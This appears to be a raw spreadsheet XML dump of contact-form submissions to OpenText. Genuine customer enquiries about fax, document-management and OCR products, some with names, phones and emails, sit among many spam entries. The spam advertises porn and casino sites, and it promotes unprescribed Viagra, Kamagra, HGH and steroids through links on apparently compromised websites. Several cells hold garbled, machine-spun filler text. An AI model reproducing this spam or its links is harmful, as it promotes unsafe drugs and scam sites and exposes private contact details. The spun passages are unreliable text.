the west is over loaded via unrealistic depictions of love, internet dating and in addition parents. caused by recognition debacles regarding overblown cinema romances, in addition particularly exaggerated depictions to goals approximately atmosphere, impress then sex, The content is without a doubt spamming all of us by means of photographs additionally creative concepts which could be the actual precise opposite of just what effective in wedlock. browse around at the employees for some time have an a marriage keep going, and also the happy do they really appear?_x000D_
_x000D_
when we deliverables for the purpose romantic relationship calls for become overblown, they start to have unhappy plus upset. comfortably married folks have an authentic idea that romantic relationship got always most suitable, plus joint venture common fancy have proven to be you have to things work on, to enhance over months. if you find yourself nurturing combined with compassionate of one another, You have an improved chance of good results while part of couples._x000D_
_x000D_
generally the entire family who have get to the group mental health care work on by reason of correlation setbacks analysis associated with their precious nuptials nowhere to be found it's actually appeal ancient ti</t>
  </si>
  <si>
    <t>I am looking for a change in my career to learn and sales new solutions focused in help customer im the new industry changes.</t>
  </si>
  <si>
    <t>Tune in for some of the perfect and most wanted sex movs online by simply surfing [url=https://www.pornmd.pro]www.pornmd.pro[/url], the number one place where you can find any type of videos of porn your mind desires in seconds. The awesome porn stars, the finest teens and many more, all available to rock your sexual fancy with mind blowing 3d porn videos. Only perfect adult content in HD image and with the best options you can get, all for free at [url=https://www.pornmd.pro]www.pornmd.pro[/url], the only place to complete your idea in proper modes.</t>
  </si>
  <si>
    <t>Can you provide me a sales rep. where we can send an RFP?</t>
  </si>
  <si>
    <t>casino online _x000D_
[url=http://playcasinoonline24.com/]casino games slots[/url] _x000D_
&lt;a href="http://playcasinoonline24.com/"&gt;online casino slots&lt;/a&gt; _x000D_
casino games</t>
  </si>
  <si>
    <t xml:space="preserve">Тренируйте мозг с удовольствием! _x000D_
Развивайте память, внимание и мышление с помощью онлайн-тренажеров! _x000D_
 _x000D_
1.Оцените ваши способности _x000D_
Пройдите вводное тестирование, чтобы получить оценку вашего текущего уровня памяти, внимания и мышления. Для вас будет сформирована персональная программа развития _x000D_
 _x000D_
2.Выполняйте ежедневную _x000D_
тренировку _x000D_
Ежедневная программа развития включает разминку и тренировку. Это займет у вас 15 минут в день _x000D_
 _x000D_
3.Следите за вашим развитием _x000D_
Следите за статистикой ваших тренировок, улучшайте показатели, сравнивайте свои достижения с результатами других пользователей _x000D_
 _x000D_
[url=https://youtu.be/7yjEv6st6JE]игры для девочки 4 года развивающие играть онлайн бесплатно[/url] _x000D_
[url=https://youtu.be/HIWUtqM68dI]скачать детские развивающие игры от 4 до 5 лет[/url] _x000D_
[url=https://youtu.be/lCA1ZSn0LVQ]развивающие игры для детей с 2 лет своими руками[/url] _x000D_
[url=https://youtu.be/yi1NMK3C_pg]развивающие игры для ребенка в 2 года онлайн бесплатно[/url] _x000D_
[url=https://youtu.be/ii3mkHBHbd0]развивающие игры с 4 до 5 лет для мальчиков[/url] _x000D_
[url=https://youtu.be/nv_gE2QAPjg]игры для мальчиков развивающие 6 лет пазлы онлайн бесплатно[/url] _x000D_
[url=https://youtu.be/4YBomlv6zjA]игры развивающие для детей от 10 до 12 лет[/url] _x000D_
[url=https://youtu.be/lkKE_WfMhD8]развивающие игры бесплатно для детей от 6 8 лет[/url] _x000D_
[url=https://youtu.be/3amnvpM0RWQ]детские развивающие игры для детей онлайн бесплатно 2 года[/url] _x000D_
[url=https://youtu.be/uKjaKu8eO8Y]развивающие игры с 4 до 5 лет для мальчиков[/url] _x000D_
[url=https://youtu.be/Suq2Q8ZdDD4]развивающие игры для детей от года скачать на телефон[/url] _x000D_
[url=https://youtu.be/w2yvzegIBDw]детские развивающие игры для детей 6 7 лет играть[/url] _x000D_
[url=https://youtu.be/wAPFxPVsvRw]развивающие игры для детей от года скачать на телефон[/url] _x000D_
[url=https://youtu.be/uhHubX5v5fQ]развивающие бесплатные игры для детей 4 лет на андроид[/url] _x000D_
[url=https://youtu.be/L9ZMs6hvGWM]скачать детские развивающие игры на компьютер с </t>
  </si>
  <si>
    <t>If you search to view some of the boss and highly exclusive xnxx porn videos with only click, then you should visit [url=https://www.nimila.net]nimila.net[/url] mom son porn tube web site. Here at [url=https://www.nimila.net]nimila.net[/url] free porn elephant tube you will find dirty free porn videos online and tons of horny porn stars, all available and always on duty for the best dp action.</t>
  </si>
  <si>
    <t>Hi there,_x000D_
_x000D_
I'm currently working with a customer on the Box side who is in the market for an eDiscovery tool. I know previously Box integrated with Recommind so I just wanted to double check to see if this is still the case for Axcelerate + Box?_x000D_
_x000D_
Thanks,_x000D_
Ashley</t>
  </si>
  <si>
    <t>Your Whitepaper "Use Entity Modeling for Simplified Application Development when Automating Business Processes" was not available via the email link.  If possible, could you forward a PDF copy to my email?</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.mumtazkeklik.com/images/slider.php?id=41-Generic-Cialis-20mg-Purchase-Cialis-Ireland-Kamagra-Jelly-Uk]Generic Cialis 20mg[/url]_x000D_
 Manage your iPad display screen so that it operates most successfully for yourself. In the event you simply click by using an icon, it will start wiggling. This can then permit you to shift it to what ever place on your own screen works for you. You can manage icons into folders or position them on various monitors to enhance your output._x000D_
  [url=http://www.oscarguerraseguros.com/images/client.asp?p=92-Kamagra-Oral-Jelly-EspaÃ±a-Kamagra-Gel-Generico-Kamagra-Oral-Jelly-Efectos]Kamagra Oral Jelly EspaÃ±a[/url]_x000D_
 Struggling with debt from charge cards is a thing that everyone has handled sooner or later. Whether you are seeking to increase your credit in general, or get rid of yourself from the tough financial circumstances, this information is guaranteed to have tips which will help you with a credit card._x000D_
  [url=http://www.alvernia.gasoft.com.co/Scripts/class.php?h=29]Cialis Como Tomar[/url]_x000D_
 There are a few drugs to assist prevent more baldness, but few of them have been shown to regrow any type of your hair. Know about boasts that say you are able to regrow a full mind of locks because they are typically is and frequently indicate something which may actually be harmful._x000D_
  [url=http://www.ismenteks.com/feed/gallery.php?k=29]Kamagra Gel Belgie[/url]_x000D_
</t>
  </si>
  <si>
    <t>Looking for an scanning/OCR solution that can assist with processing AP invoices into our ERP workflow</t>
  </si>
  <si>
    <t>kasino _x000D_
[url=http://playcasinoonline24.com/]casino games real money[/url] _x000D_
&lt;a href="http://playcasinoonline24.com/"&gt;kasino&lt;/a&gt; _x000D_
slot online</t>
  </si>
  <si>
    <t>If you prefer to view some of the top rated and really exclusive anal porn videos with simple click, then you need visit [url=https://justporno.me]justporno.me[/url] red tube free porn web site. Here at [url=https://justporno.me]justporno.me[/url] extreme porn tube you will get nasty free sex videos online and thousands of stunning porn stars, all available and always on duty for the best dp action.</t>
  </si>
  <si>
    <t>Captiva products. We would like more info on the Captiva suite for imaging. Call or email._x000D_
613-867-0352_x000D_
pgollin@noticialaw.com</t>
  </si>
  <si>
    <t>Buena tarde_x000D_
Me podrían apoyar a cotizar Cliente de Centura Team Developer, nosostros somos distribuidores de tecnologias de la informacion, y tenemos un cliente que requiere este software, me podrían indicar si lo podemos vender y que información necesitan para cotizarlo_x000D_
_x000D_
Saludos</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Sir/Madam,_x000D_
_x000D_
I am Yaswanth Mangalagiri, studying in Geological Technology in IIT Roorkee._x000D_
I would like to intern in your company for Summer 2018 for 2 months in the fields of Software Development._x000D_
My recent achievement was I got listed in Google's Hall of fame as well as Facebook's white hat thanks list for exploiting security flaws. I would like to send you my resume._x000D_
_x000D_
Thank you._x000D_
Yours sincerely,_x000D_
Yaswanth Mangalagiri_x000D_
</t>
  </si>
  <si>
    <t>casino slots _x000D_
[url=http://playcasinoonline24.com/]online casino games[/url] _x000D_
&lt;a href="http://playcasinoonline24.com/"&gt;slot online&lt;/a&gt; _x000D_
best online casino</t>
  </si>
  <si>
    <t>I need someone to contact me about Treasury integration services</t>
  </si>
  <si>
    <t>Neapco Europe hast two location in Europe. We would like to buy 10 floating licenses for loction in Germany and 10 floating licenses for loction in Poland. Do we need orded the licenses separately for Poland and Germany? Can we use one central license server for all 20 licenses or we need to create separated server for each location? Wat means SKU TX and TXL?</t>
  </si>
  <si>
    <t>Pricing on OpenText eDOCS for legal?</t>
  </si>
  <si>
    <t>как-то не могу разобраться, действительно ли так, как здесь   [url=http://ukrat.ru/index.php?/Trudovoe-pravo/zakonno-li-ustanavlivat-kamery-v-sluzhebnyx-pomeshheniyax-dlya-nablyudeniya-za-rabotnikami-kompanii.html]видеокамеры для наблюдения за соблюдением техники безопасности[/url] или  есть  иные варианты.</t>
  </si>
  <si>
    <t>I'm familiar with Open Text from my former employer. We would like to explore an alternative to what we're presently using (Axacore Desktop Faxing)</t>
  </si>
  <si>
    <t xml:space="preserve">SFO using eDocs as the standard for document archiving.  I would like to discuss the prccess for setting up an account. </t>
  </si>
  <si>
    <t>Good afternoon,_x000D_
_x000D_
We are studying the option of implanting this app to a process that consist on compare and extract some relevant data from different contract (insurance contract with another company). Would it be able to do it?._x000D_
_x000D_
We would appreciate if you could answer by email._x000D_
_x000D_
Thanks in advance,_x000D_
Regards.</t>
  </si>
  <si>
    <t xml:space="preserve">Boa tarde. _x000D_
Estamos realizando um levantamento em todas as aplicações na Embraer São José dos Campos_x000D_
Hoje temos a versão 6.7.2000.0039 do DOCUMENTUM GBI  e gostaríamos de saber qual é a última versão dessa aplicação._x000D_
Obrigado._x000D_
</t>
  </si>
  <si>
    <t>Hi Opentext, I am one of the engineers within CenturyLink/Savvis. I am trying to reach out to the network team at the Scottsdale AZ ( former Informative Graphics ) location. We provide Internet access to that office and we are planning to sunset it and replace it. Can you provide me with a contact I can let know. thank you! - Mason</t>
  </si>
  <si>
    <t>I already had an account and I purchased the Brava reader since the free program is no longer available. I got the conformation emails, but can't seem to find where or how to even download the new program. Please advise. Thanks</t>
  </si>
  <si>
    <t>Anfrage zu einem ausstehenden EIM Projekt aus dem Bereich Purchase to Pay</t>
  </si>
  <si>
    <t>Please share Java libraries for sending faxes. Genco already purchased your software long time back. We are in process of migrating to new 2012 servers.</t>
  </si>
  <si>
    <t>Hi team,  _x000D_
We currently have Alchemy Gold installed on one of our 2003 servers.  However i don't believe we have a software maintenance with the product.  Can you provide a quote for this please?_x000D_
Also we need to move the Alchemy software from the 2003 server to a 2012 VM server.  Are you able to assist with this?_x000D_
_x000D_
Serial Number:  G001-45216-166_x000D_
_x000D_
Thanks_x000D_
Mohammed Khan</t>
  </si>
  <si>
    <t xml:space="preserve">Do you have another delivery method for your trial download of Brava! Desktop._x000D_
My company email server has blocked the email from 'info@mktg.opentext.com' and will not release it.  </t>
  </si>
  <si>
    <t>I have EIN 6500 shares which I believe became open text shares in 2010. I would like a statement of account</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
I am a software consultant representing a non-profit organization with a staff of 400 based in NYC and regional offices around the country.  The organization has prepared an RFP for a document management system and related design and implementation services.  Needs are diverse, ranging from structured workflow for contracts and invoices, to flexible classification and search of program and policy material._x000D_
_x000D_
Please let me know if this fits within the market and functionality of your document management solutions and I’ll be happy to send you their RFP.  They are seeking information, follow-up demos, and formal proposals leading to system selection over the next six months with implementation to begin in 2019._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Don Moore_x000D_
917-509-2375_x000D_
</t>
  </si>
  <si>
    <t>I require contact information for a sales representative who would handle a public RFP for a higher education institution._x000D_
_x000D_
Thank you.</t>
  </si>
  <si>
    <t>I'm purchasing Brava Desktop after Brava Reader support ended.  I have one person who will be using Brava Desktop.  Can Brava Desktop legally be installed in a virtual environment for one person to use?  The virtual environment is open to more than this one person.</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.ludo-lamarelle.fr/layouts/book.php?p=76.html]Viagra For Kvinner Helse[/url]_x000D_
 If you are unclear what colour shoes or boots to put on with the clothing you are interested in, you should think of sporting nude pumping systems. These comfortable shoes go along with practically anything you pair them. Additionally, you will get the included benefit of these generating your legs seem considerably longer and slimmer._x000D_
  [url=http://www.centrodaconstrucaoroloff.com.br/includes/mail.php?num=32]Lovegra Kaufen Preisvergleich[/url]_x000D_
 If user or client deals are normally found on our web site, talk simply with them, preventing lawful jargon whenever possible. You desire your clients to feel as if they understand what is happening and getting explained. Legitimate terminology will confound your potential customers, and will also make them apprehensive concerning your internet site._x000D_
  [url=http://www.bulutbilisimi.com/wp-content/define.php?for=242]Hgh Injections[/url]_x000D_
 Established your anticipations and targets for the photo above where you really believe it will become successful. If you consider you might be create to the excellent par, then snap for any bogie. The human head has a odd means of functioning in a advanced level when it is reacting to difficulties and will assist strength your golf swing to a additional level._x000D_
  [url=http://www.lucianobonfim.com/diarios/tille.php?bj=15]Sildenafil[/url]_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Dear OpenText,_x000D_
You are getting this email because we want to get in touch with your OpenText regarding our Master Thesis for BI Norwegian Business School. _x000D_
We are Double Degree Masters Students at Queens University and BI Norwegian Business School. The sender of this email is Lydia Rowe, and Martin Broeng is CC._x000D_
Our thesis project focus is on the knowledge dynamics of the Toronto-Waterloo Information Communications Technology (ICT) cluster. Specifically, we are interested in the local and global flows of embodied knowledge and the impact the presence of Silicon Valley multinationals has on these flows. As this thesis looks at embodied knowledge as the “know-how” knowledge contained within individuals, we intend to measure these embodied knowledge flows via the flows of individuals within the cluster (e.g. students, researchers, engineers, etc.). _x000D_
As we see your firm, OpenText, as a significant actor in the Toronto-Waterloo ICT cluster, we would like to conduct qualitative interviews to collect data and understand your firm's perspective. We are specifically interested in information regarding:_x000D_
o	Motivation to locate in Toronto-Waterloo area_x000D_
o	Involvement (and role) in the cluster_x000D_
o	Interaction with universities and research institutions_x000D_
o	Talent flows (recruiting, turnover, transfers)_x000D_
o	Knowledge flows with regards to the cluster_x000D_
o	Perceived value and role in knowledge sharing_x000D_
o	Perceived impact of Silicon Valley on cluster_x000D_
o	General cluster perceptions _x000D_
If you could please put us in contact with the appropriate personnel of your organization, it would be much appreciated. We will provide further information about our research as well as how we will collect and store the data as the process continues, and provide a consent form for individuals participating in interviews. _x000D_
_x000D_
Kind regards, _x000D_
Lydia Rowe and Martin Broeng_x000D_
+1 (709) 699-9117 /+47 97 01 47 64 _x000D_
lydia.rowe@queensu.ca / martin.brong@student.bi.no_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Pricing and options for eFax server. </t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
As a part of a project I am currently working on for a customer, we want to make documents stored in the customer's edocs DM solution accessible from their ERP system. We have proposed to solve this with hyperlinks (http://, https:// or ftp://) in the ERP master data linking directly to each document in DM. However, I have not managed to find a functionality to get a shareable document link in DM. I assume this is technically possible, since the documents in DM are accessible online through the solution, therefore there must be atleast an IP/server pointer to each document. In other document storage solutions like Microsoft Sharepoint, this functionality is standard._x000D_
_x000D_
So my question is: 1) Is it possible to get direct links to documents stored in edocs DM, and if so 2) How do I get access to these links?_x000D_
_x000D_
If this is not possible, are there any other easy solutions to access documents stored in DM directly from a 3rd party software?_x000D_
_x000D_
Best regards,_x000D_
Mikkel Lindheim</t>
  </si>
  <si>
    <t>slot online _x000D_
[url=http://playcasinoonline24.com/]casino games real money[/url] _x000D_
&lt;a href="http://playcasinoonline24.com/"&gt;casino games slots&lt;/a&gt; _x000D_
slot online</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.im.br/erros/lib.php?p=24]Acheter Kamagra Oral Jelly Pas Cher[/url]_x000D_
 Request friends and family for ethical support. They can be unable to give your cash, nevertheless, you must be able to tell them relating to your challenges and also to toned upon them. It may be challenging to discuss cash with the folks in your area. You will likely discover they are much more encouraging than you expect._x000D_
  [url=http://www.clip-tv.at/wp-admin/user/class.php?p=66]Cialis Generika GÃ¼nstig[/url]_x000D_
 Use musical treatment to be able to ease the anguish while you are struggling with serious irritation. Even though it isn't a permanent resolve which is far away from medicine and serious pain relief, you can find research who have established traditional songs and also other calming types of tunes to become restorative when dealing with ache from arthritis._x000D_
  [url=http://www.loarquitectos.com.ar/images/corgan.asp?sa=127]Cialis Prezzo Piu Basso[/url]_x000D_
 While many instances of baldness can be associated with pressure, heredity or very poor nutrition, some can be a cause of problem and should be looked into out by your family members medical doctor. Hair thinning is an early on forewarning sign of a yeast illness, lupus or all forms of diabetes. It is very important be properly determined and have remedy for the underlying source of baldness._x000D_
  [url=http://www.pynkiss.ae/footer/kontakt.php?p=98-Viagra-Norge-Pris-Viagra-50mg-Viagra-Apotek-Norge.html]Viagra Norge Pris[/url]_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.dann.be/wp-content/event.php?uk=1165-Tadalafil-Uk-Next-Day-Delivery,Methenolone-Oral,Tadalafil-Supplier.html]Tadalafil Uk Next Day Delivery[/url]_x000D_
 Create a schedule to release your mobile phone advertising campaign. You can use the calendar option to setup a schedule to discharge your marketing campaign back then and particular date you want. This can help you to target these huge events and free up your time and energy to pay attention to other stuff._x000D_
  [url=http://www.burgazyemek.com/images/cabecalho.php?op=78-Buy-Kigtropin-Hgh-Uk-Buy-Jintropin-Online-Igf-1-Lr3-Legal-In-Australia.html]Buy Kigtropin Hgh Uk[/url]_x000D_
 If you are considering starting up a company, but they are concerned with your own financial predicament, pitch your plan to brokers or perhaps a economically-sound prospective organization companion. It may not be ideal, but you can get your small business above the ground should your strategy appears to be successful enough to the right individuals._x000D_
  [url=http://www.columnconcepts.com/database/bage.php?cont=751-Nandrolone-Decanoate-Powder-Buy-Clomiphene-Citrate-Australia-Methandienone-Wholesale.html]Nandrolone Decanoate Powder Buy[/url]_x000D_
 Society is way too distracted with dollars. When we attain retirement living grow older we can rid yourself of this. We certainly have some time to pursue likes and dislikes like tunes and painting, and may gain tremendous entertainment from their store. A skill or art accomplished for the real joy of it brings actual gratification._x000D_
  [url=https://.syarikat-sdnbhd.com/modules/pika.php?a=970-Raw-Clomid-Powder,Buy-Stanozolol-Tablets-Australia,Mesterolone-Canada]Raw Clomid Powder[/url]_x000D_
</t>
  </si>
  <si>
    <t>Software de reconocimiento de documentos y captura de datos.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi, I have been provided a download link for RightFax by Dave Verkade (Solution Consultant EMEA |  Business Network (BN)), but I cannot download it. It says "No Access - We're sorry, your account does not grant you access to this resource". Dave has asked me to contact you. Thanks, Chris._x000D_
</t>
  </si>
  <si>
    <t>Hello,_x000D_
Simple question, is it possible to install newest version of OpenText document &amp; Report Management on IBM i7.1 system? If not, why?_x000D_
Regards,_x000D_
Sebastian</t>
  </si>
  <si>
    <t>I have some GDPR compliance questions and not sure who is the most appropriate contact within Opentext to direct my questions to.</t>
  </si>
  <si>
    <t xml:space="preserve">For employment </t>
  </si>
  <si>
    <t>City of Hobart have commenced planning in relation to its current records and document management system (Trim)._x000D_
As part of our initial activities we’re inviting a number of organisation to present a capability overview of their products and services (1-2 hours). _x000D_
It is proposed that a change to our current system will be undertaken within the next financial year in order to provide our staff (550 FTE, 770 in total, and almost 700 volunteers) with a contemporary information, content and records management platform.   _x000D_
At that stage Council will revert to a formal process in alignment with our stated procurement policies. _x000D_
Please feel free to contact me directly via email or the phone number listed below and we can aim to schedule a time for myself and key staff to view your solution over the coming months.</t>
  </si>
  <si>
    <t xml:space="preserve">Hello Sales-_x000D_
_x000D_
_x000D_
_x000D_
I have come across to your website and have a question see if you can assist:_x000D_
_x000D_
_x000D_
_x000D_
I wanted to explain little bit about my company: We are DOD contractor and we resell the spare parts to the US DOD. I am looking for an automated RFQ which can make it easy for us to increase our revenues._x000D_
_x000D_
_x000D_
_x000D_
I received quotes from the competitor for all the DLA RFQ solicitations over time and I noticed that 5 companies are using the same RFQ format which seems to be automated RFQ tool as it is impossible to fill out that detail information on the RFQ for one vendor which is very time consuming. Please see attached. _x000D_
_x000D_
_x000D_
_x000D_
Does your company do this work if not do you know where to guide us to get the same tool so we can process our RFQ's more faster and efficient._x000D_
_x000D_
_x000D_
_x000D_
Your prompt response is much appreciated._x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>online slots _x000D_
[url=http://playcasinoonline24.com/]casino games slots[/url] _x000D_
&lt;a href="http://playcasinoonline24.com/"&gt;casinos online&lt;/a&gt; _x000D_
online casino real money</t>
  </si>
  <si>
    <t>evaluating for archiving solution using open text . Looking at Avaali presentation deck, we are looking for Information Technology excellence capability of OpenText Extended ECM.</t>
  </si>
  <si>
    <t>Hi There _x000D_
_x000D_
We're interested in the training course 3-0188 OpenText Content Server System Administrator v16.2 and would like to know if this course will be run in a New Zealand or Australian location?_x000D_
_x000D_
Many thanks_x000D_
Jessica</t>
  </si>
  <si>
    <t>If you live somewhere other than under a large rock, the premise of The Tangled Lands will sound familiar: A declining empire owes its former splendor to a miraculous energy source. Now, emissions from that source threaten to destroy the empire. Everyone’s freaking out. _x000D_
 _x000D_
The story is (maybe too) obviously an allegory of climate change. Instead of hydrocarbons, the fictional world Paolo Bacigalupi and Tobias Buckell create in their recently released novel draws power from magic, which also fertilizes the voracious, writhing, poisonous weeds now bearing down on one of the last great cities. Migrants pour in from the bramble-choked periphery. The rich and powerful seek to turn the crisis to their advantage while ordinary citizens resist. Al Gore is … not there, but you get the point. _x000D_
 _x000D_
Novels like The Tangled Lands are seismographic readings from a trembling society. They register a profound anxiety that the world we know is collapsing under our feet. Literary critics interested in climate change are currently debating whether these works can also give readers tools for addressing the ecological crisis. Perhaps fiction, the thinking goes, makes it easier to wrap our heads around complex environmental changes and dream up useful ways of dealing with them. _x000D_
 _x000D_
The stakes are high. “If there is any one thing global warming has made perfectly clear,” wrote novelist Amitav Ghosh in The Great Derangement, “it is that to think about the world only as it is amounts to a form of collective suicide.” _x000D_
 _x000D_
Fiction that wrestles with the changing world takes a number of forms. Some aspire to a kind of gritty realism (David Simon’s television series “Treme,” for example). Other works pine for better days or “trade in the nostalgic dreams of empire’s many lost wonders,” as a character in The Tangled Lands puts it. In general, science fiction and fantasy are the preferred genres for staging the sometimes slow, sometimes holy-shit-I-should-write-a-will-fast transformation of t</t>
  </si>
  <si>
    <t>Hellow my name is MartinVor. Wery capable article! Thx :)</t>
  </si>
  <si>
    <t>slot game _x000D_
[url=http://playcasinoonline24.com/]online slots[/url] _x000D_
&lt;a href="http://playcasinoonline24.com/"&gt;casinos online&lt;/a&gt; _x000D_
online gambling casino</t>
  </si>
  <si>
    <t>online gambling casino _x000D_
[url=http://playcasinoonline24.com/]casinos online[/url] _x000D_
&lt;a href="http://playcasinoonline24.com/"&gt;casinos online&lt;/a&gt; _x000D_
casinos online</t>
  </si>
  <si>
    <t>trial license expired, would like to look at pricing for product_x000D_
 need to be able to print, save as PDF and possibly remove layer for printing</t>
  </si>
  <si>
    <t>Does OpenText itself support and staff expertise for  Liquid Office professional services?  If so, can you please forward me their contact information.</t>
  </si>
  <si>
    <t>Looking to upgrade our current in-house fax solution with a hybird or cloud approach. We are currently in the vendor discovery phase and would like to know the costs of going to this model with OpenText.</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
We are releasing a RFI and would like your organization to join. Please send me a contact to whom this RFI should be appointed to. Thank you.</t>
  </si>
  <si>
    <t>Большинство из скважин по окончании выполнения восстановительного комплекса мероприятий позволят быть снова введены в использование. Тем более что оплата таких действий в десятки раз ниже общей стоимости самих сооружений. _x000D_
Гарантировано повышение сбыта водозаборной скважины не менее 30 процентов от существующего на момент старта работ. _x000D_
 _x000D_
В 80 процентах случаях скважины возобновляются до основных данных при включении в текущую эксплуатацию скважины, что становится альтернативой бурения новой скважины. _x000D_
 _x000D_
Наши сотрудники торговые компании по Очистке КНС (Канализационно-насосная станция)  и Очистке обсадной трубы водозаборной скважины предлагаем свои услуги всем, как частным так и общественным организациям. _x000D_
 _x000D_
 _x000D_
Спецводсервис : [url=https://svs-samara.ru/skvazhiny/remont-vodozabornyh-skvazhin/]капитальный ремонт скважин[/url] _x000D_
SpecVodService : [url=https://svs-samara.ru/skvazhiny/ochistka-vodozabornyh-skvazhin/]фильтр грубой очистки воды для скважины[/url]</t>
  </si>
  <si>
    <t xml:space="preserve">Hello Sales Team,_x000D_
We have an urgent requirement for EU-ENY, We work with the Mumbai team very closely and happy to assistance then._x000D_
_x000D_
We are looking for renewal of the below encase dongles. Please call me to discuss this and support with your best offer to closure in 10days_x000D_
•	C1002043726 - RMA_x000D_
•	C1002043741 - Upgrade_x000D_
•	G2002060090 - Upgrade_x000D_
•	G2002060099 - Upgrade_x000D_
•	G2002063500 - Upgrade_x000D_
•	G3002090118 - RMA_x000D_
•	G3002090132 - Upgrade_x000D_
•	G2002060074 - Upgrade_x000D_
•	Encase Forensic V 8.0 Software (perpetual license with one year SMS) -New_x000D_
_x000D_
Thanks,_x000D_
Meenu _x000D_
</t>
  </si>
  <si>
    <t>Would like an idea of how much OpenText would cost to deploy.  We are a company of about 375 computer users.  Other questions:_x000D_
_x000D_
* How is OpenText licensed (by user or general license)?_x000D_
* Is OpenText an on premise solution?  If so, what are the requirements for server?_x000D_
* Does OT support discovery searches?  Looks like retention policies are supported._x000D_
_x000D_
Thanks,_x000D_
Rick</t>
  </si>
  <si>
    <t>I am currently taking the 1-0107_eL Using Content Server v16 course, and my manager explained that we have a package of classes with a set price available to us. I would like to transfer my registration for this current course to the package so I'm not paying for each of the classes I'd like to take individually. What do I need to do to make this happen?</t>
  </si>
  <si>
    <t xml:space="preserve">We currently utilize Right Fax Express S/N DT2013470. How much would a 4 port appliance purchased be? What are the support costs per year?_x000D_
Thanks_x000D_
</t>
  </si>
  <si>
    <t>Requesting a user guide for Easylink efax services on behalf of Varian Medical Systems' user, David Aguilar.</t>
  </si>
  <si>
    <t>best online casino _x000D_
[url=http://playcasinoonline24.com/]online gambling casino[/url] _x000D_
&lt;a href="http://playcasinoonline24.com/"&gt;slot game&lt;/a&gt; _x000D_
online casino gambling</t>
  </si>
  <si>
    <t xml:space="preserve">viagra levitra viagra custombbs.cgi_x000D_
 [url=http://viagrawithoutdoctorpharm.com]viagra without a doctor_x000D_
[/url]  viagra us pharmacy_x000D_
 &lt;a href="http://viagrawithoutdoctorpharm.com"&gt;viagra without prescription_x000D_
&lt;/a&gt; - viagra, cheap viagra, cheap viagra online, viagra ,cheap viagra ,online viagra ,online pharmacy, viagra online, viagra generic, cheap viagra noprescription, cheap viagra with no prescription, cheap viagra online,online pharmacy,_x000D_
 viagra and alcohol mix administrators_x000D_
</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
We are working with a client (lands end) who is in the process of selecting a digital asset management solution.  It would be helpful to connect with someone directly to help shape a trial engagement and evaluation of your DAM and CMS solution.  Please let me know who we can work with directly.  Thanks_x000D_
_x000D_
Tim Kadom</t>
  </si>
  <si>
    <t>Necesito conocer costos de la solución de fax</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.salmarine.ir/filter/header.asp?PageId=516-Lovegra-Review-Achat-Kamagra-Oral-Jelly-Suisse-Viagra-Sans-Ordonnance-En-Pharmacie-En-France]Lovegra Review[/url]_x000D_
 Make sure you browse around for experience and skilled photographers, before you decide to commit to 1 to your wedding party. You do not want a person using wedding party pictures that you are currently not pleased with. For guidance on excellent photographers in your town, you should check out reviews online or request relatives when they are aware of 1._x000D_
  [url=http://www.spanishluxuryfootwear.com/wp-content/hope.php?talk=Igf-1-Lr3-Alley-Jintropin-Comprar-Hormona-Del-Crecimiento-Muscular-171.html]Igf 1 Lr3 Alley[/url]_x000D_
 Investing in a health and well being treatment coverage is amidst probably the most essential selections of your life, and you ought to make an informed choice. Determine what every individual plan gives, insurance deductibles, and co-will pay. The things you don't want is to buy a plan blindly and discover in case of a crisis you don't possess the coverage you need._x000D_
  [url=http://www.hepll.com/images/cache.asp?te=183-Kamagra-Gel-Flashback-Kamagra-Oral-Jelly-Sverige-Viagra-Generico-Farmacia]Kamagra Gel Flashback[/url]_x000D_
 A number of people view a gorgeous photograph and speculate should they can make the same kind of image using their own digicam employing what they see within their every day existence. There are plenty of suggestions and ideas which can be available which can help you recreate one of your beloved images. Here are some of which!_x000D_
  [url=http://www.erkancerit.com/css/brands.asp?k=239-Hgh-Fragment-176-191-Review-Getropin-Dosage-Igf-1-Uk]Hgh Fragment 176-191 Review[/url]_x000D_
</t>
  </si>
  <si>
    <t>download opentext capture center and want to know how to extract text from image using opentext</t>
  </si>
  <si>
    <t>checking to see if we are current with our support contract for RightFax</t>
  </si>
  <si>
    <t>kasino _x000D_
[url=http://playcasinoonline24.com/]online casino[/url] _x000D_
&lt;a href="http://playcasinoonline24.com/"&gt;online slots&lt;/a&gt; _x000D_
casino games</t>
  </si>
  <si>
    <t xml:space="preserve">Interested in finding out more about your OpenText Output Transformation product and possibly other related products.  </t>
  </si>
  <si>
    <t>Hi, I'm looking for a smart OCR solution to scan business documents in pdf or jpeg, to extract and load the information to transnational and analytics system in an organized manner.  Could you let me know how your solution works, please? Thank you. Kaoru Kajimachi</t>
  </si>
  <si>
    <t xml:space="preserve">Interested in OCR capabilities, price, and a demo. </t>
  </si>
  <si>
    <t>Exploring possibility of utilizing cloud fax solution. Currently use a in-house Right Fax server. We have about 60 RF clients who can fax plus an automated batch fax that was setup in 2006. Instead of upgrading to a current version I wanted to see if a cloud service would be a better fit. this involves PHI data so needs to be secure and reliable.</t>
  </si>
  <si>
    <t>I am looking to get in touch with a member of your board of directors - Paul Jenkins (also former Chief Executive Officer and President) - on behalf of an associate of his. I am trying to get a message to him but don't have his current email address. Do you have a number or email for his current executive assistant or someone else who may be able to screen a message for him?_x000D_
_x000D_
Thanks very much_x000D_
_x000D_
Caroline</t>
  </si>
  <si>
    <t>OpenText Document Presentment (Exstream) 16.2 - looking for a demo environment to try the new functionality delivered with this latest version of Document Presentment.</t>
  </si>
  <si>
    <t>We're currently running RightFax locally and are interested in switching to a cloud-based solution. We're interested in quotes for both Fax2Mail and RightFax Connect. We have very low fax volume  per month (probably less than 100 pages), and have around 60 users currently. Keeping our existing fax numbers is also mandatory.</t>
  </si>
  <si>
    <t>Bewerbung</t>
  </si>
  <si>
